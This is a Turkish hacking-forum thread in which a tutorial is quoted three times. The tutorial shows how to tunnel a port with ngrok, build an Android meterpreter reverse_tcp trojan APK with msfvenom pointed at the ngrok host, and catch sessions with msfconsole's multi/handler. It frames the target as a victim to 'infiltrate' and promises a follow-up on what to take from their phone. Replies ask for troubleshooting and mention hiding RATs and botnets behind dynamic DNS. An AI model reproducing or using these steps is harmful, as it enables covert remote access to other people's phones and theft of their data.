Port Nasıl Açılır / Trojan İle Nasıl Sızarız

C-137

Katılımcı Üye
6 May 2022
286
70
Kali Linuxa suspend atacaksiniz. Yoksa baska bir çaresi malesef yok.
reis ngroku çıkarıp attım masa üstüne terminale kodu yazdıgımda şunu diyo


Command 'ngrok' not found, did you mean:
command 'grok' from deb grok
Try: apt install <deb name>


nasıl çözebilirim lütfen yardım aga

hocam ben ngrok tokenini yazdıgımda şöyle bi hata veriyor
Command 'ngrok' not found, did you mean:
command 'grok' from deb grok
Try: apt install <deb name>

sizce ne yapmalıyım
 

C-137

Katılımcı Üye
6 May 2022
286
70

C-137

Katılımcı Üye
6 May 2022
286
70
ardından tarın içindeki ngroku masaüstüne atın ardından terminali masaüstünde açın. demişim
rrlgl0p.png buyurun hocam bi yanlışım varsa lütfen söyleyin


logo.png






Evet En Son Trojanımızı Oluşturmuştuk. Şimdi Trojanı Nasıl Kullanırız Oradaki port bilgilerini nasıl alırız onu anlatacağım dostlarım




Microsoft.VisualStudio.Services.Icons.Default




Port Nasıl Açılır ?


>> Portu açıcaz evet ama modem ile değil ngrok ile olucak bu bize bir statik ip sağlıyacak aynı duck dns gibi


>> Gelelim ngrok portu nasıl açılır.


>> Öncelikle Ngrok'un sitesine geliyoruz.








Download For Linux Kısmına Tıklıyoruz. Ve İndiriyoruz



1.png





ardından zipin içindeki ngroku masaüstüne atın ardından terminali masaüstünde açın.








Buradaki tokeni kopyalıyoruz hepsini kopyalayın ben bir kısmını gözükmemesi için karaladım
ve terminali açıp "ngrok config add-authtoken 27mdyksAuH0lquS2bQXvlP8k2hU..." yapıştırıyoruz.





1.png





"./ngrok tcp 2005 ( buradaki sayı sizin portunuz )" yazıyoruz
enter tuşuna basıyoruz evet artık sizin bir statik ipiniz var :)
Size verilen kısım böyle olucak tabiki sayılar farklı olucak sizde bunları diğer konuda verdiğim koda yapıştırıyorsunuz.



"
msfvenom -p android/meterpreter/reverse_tcp set LHOST=tcp://6.tcp.eu.ngrok.io LPORT=16730 -o /root/Masaüstü/deneme3.apk"


"
Forwarding cp://6.tcp.eu.ngrok.io:16730 -> localhost:2005"





1.png




Trojan İle Nasıl Sızarız ?


>> Terminali açıp msfconsole yazıyoruz.

>> Çıkan yere sırasıyla

>> use multi/handler

>> set payload android/meterpreter/reverse_tcp

>> set lhost 127.0.0.1 ( 0.0.0.0 yazsanizda olur )

>> set lport 2005

>> run komutunu yazarak trojanı dinliyoruz.








evet şimdi trojanımızı telefonumuza attık ve ben telefonumda açıcam bakalım bilgisi gelecek mi ?




1.png










Evet trojanımızın bilgisi gelmiş bulunmakta bu şekilde karşı tarafa sızmak çok basit


Başka Bir Konuda Sızdıktan Sonra Karşı Tarafın Telefonundan Ne Alırsınız Onu Anlatacağım Sağlıcakla Kalın
Sonraki Konunun Linki : TROJAN İLE SIZDIKTAN SONRA NE YAPARIZ






tm6syrc.png





İyi Forumlar Dilerim



hocam benim ngrok olmuyo rrlgl0p.png buyurun bakın

 

woxr1n.online

Katılımcı Üye
18 Nis 2022
600
302

logo.png






Evet En Son Trojanımızı Oluşturmuştuk. Şimdi Trojanı Nasıl Kullanırız Oradaki port bilgilerini nasıl alırız onu anlatacağım dostlarım




Microsoft.VisualStudio.Services.Icons.Default




Port Nasıl Açılır ?


>> Portu açıcaz evet ama modem ile değil ngrok ile olucak bu bize bir statik ip sağlıyacak aynı duck dns gibi


>> Gelelim ngrok portu nasıl açılır.


>> Öncelikle Ngrok'un sitesine geliyoruz.








Download For Linux Kısmına Tıklıyoruz. Ve İndiriyoruz



1.png





ardından zipin içindeki ngroku masaüstüne atın ardından terminali masaüstünde açın.








Buradaki tokeni kopyalıyoruz hepsini kopyalayın ben bir kısmını gözükmemesi için karaladım
ve terminali açıp "ngrok config add-authtoken 27mdyksAuH0lquS2bQXvlP8k2hU..." yapıştırıyoruz.





1.png





"./ngrok tcp 2005 ( buradaki sayı sizin portunuz )" yazıyoruz
enter tuşuna basıyoruz evet artık sizin bir statik ipiniz var :)
Size verilen kısım böyle olucak tabiki sayılar farklı olucak sizde bunları diğer konuda verdiğim koda yapıştırıyorsunuz.



"
msfvenom -p android/meterpreter/reverse_tcp set LHOST=tcp://6.tcp.eu.ngrok.io LPORT=16730 -o /root/Masaüstü/deneme3.apk"


"
Forwarding cp://6.tcp.eu.ngrok.io:16730 -> localhost:2005"





1.png




Trojan İle Nasıl Sızarız ?


>> Terminali açıp msfconsole yazıyoruz.

>> Çıkan yere sırasıyla

>> use multi/handler

>> set payload android/meterpreter/reverse_tcp

>> set lhost 127.0.0.1 ( 0.0.0.0 yazsanizda olur )

>> set lport 2005

>> run komutunu yazarak trojanı dinliyoruz.








evet şimdi trojanımızı telefonumuza attık ve ben telefonumda açıcam bakalım bilgisi gelecek mi ?




1.png










Evet trojanımızın bilgisi gelmiş bulunmakta bu şekilde karşı tarafa sızmak çok basit


Başka Bir Konuda Sızdıktan Sonra Karşı Tarafın Telefonundan Ne Alırsınız Onu Anlatacağım Sağlıcakla Kalın
Sonraki Konunun Linki : TROJAN İLE SIZDIKTAN SONRA NE YAPARIZ






tm6syrc.png





İyi Forumlar Dilerim



hocam ngrok ile bir link oluşturunca hiçbir şekilde açılmıyor ne bende nede kurbanda açılmıyor acaba fixmi yedi
 

K3YL0N

Yeni üye
12 Ağu 2018
37
1
Ama bunlar bir süre sonra kapatılıyor. Botnet ve RAT lar duck-dns no-ip gibi şirketlerin politikalarına aykırıdırlar. fazla botnet yada rat ınız varsa hesap kapatılıyormuş. fark edilip.
 

kaliroot

Katılımcı Üye
9 May 2022
300
217
localhost

logo.png






Evet En Son Trojanımızı Oluşturmuştuk. Şimdi Trojanı Nasıl Kullanırız Oradaki port bilgilerini nasıl alırız onu anlatacağım dostlarım




Microsoft.VisualStudio.Services.Icons.Default




Port Nasıl Açılır ?


>> Portu açıcaz evet ama modem ile değil ngrok ile olucak bu bize bir statik ip sağlıyacak aynı duck dns gibi


>> Gelelim ngrok portu nasıl açılır.


>> Öncelikle Ngrok'un sitesine geliyoruz.








Download For Linux Kısmına Tıklıyoruz. Ve İndiriyoruz



1.png





ardından zipin içindeki ngroku masaüstüne atın ardından terminali masaüstünde açın.








Buradaki tokeni kopyalıyoruz hepsini kopyalayın ben bir kısmını gözükmemesi için karaladım
ve terminali açıp "ngrok config add-authtoken 27mdyksAuH0lquS2bQXvlP8k2hU..." yapıştırıyoruz.





1.png





"./ngrok tcp 2005 ( buradaki sayı sizin portunuz )" yazıyoruz
enter tuşuna basıyoruz evet artık sizin bir statik ipiniz var :)
Size verilen kısım böyle olucak tabiki sayılar farklı olucak sizde bunları diğer konuda verdiğim koda yapıştırıyorsunuz.



"
msfvenom -p android/meterpreter/reverse_tcp set LHOST=tcp://6.tcp.eu.ngrok.io LPORT=16730 -o /root/Masaüstü/deneme3.apk"


"
Forwarding cp://6.tcp.eu.ngrok.io:16730 -> localhost:2005"





1.png




Trojan İle Nasıl Sızarız ?


>> Terminali açıp msfconsole yazıyoruz.

>> Çıkan yere sırasıyla

>> use multi/handler

>> set payload android/meterpreter/reverse_tcp

>> set lhost 127.0.0.1 ( 0.0.0.0 yazsanizda olur )

>> set lport 2005

>> run komutunu yazarak trojanı dinliyoruz.








evet şimdi trojanımızı telefonumuza attık ve ben telefonumda açıcam bakalım bilgisi gelecek mi ?




1.png










Evet trojanımızın bilgisi gelmiş bulunmakta bu şekilde karşı tarafa sızmak çok basit


Başka Bir Konuda Sızdıktan Sonra Karşı Tarafın Telefonundan Ne Alırsınız Onu Anlatacağım Sağlıcakla Kalın
Sonraki Konunun Linki : TROJAN İLE SIZDIKTAN SONRA NE YAPARIZ






tm6syrc.png





İyi Forumlar Dilerim



elinize sağlık hocam bir hata aldım yardım edebilirmisiniz?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.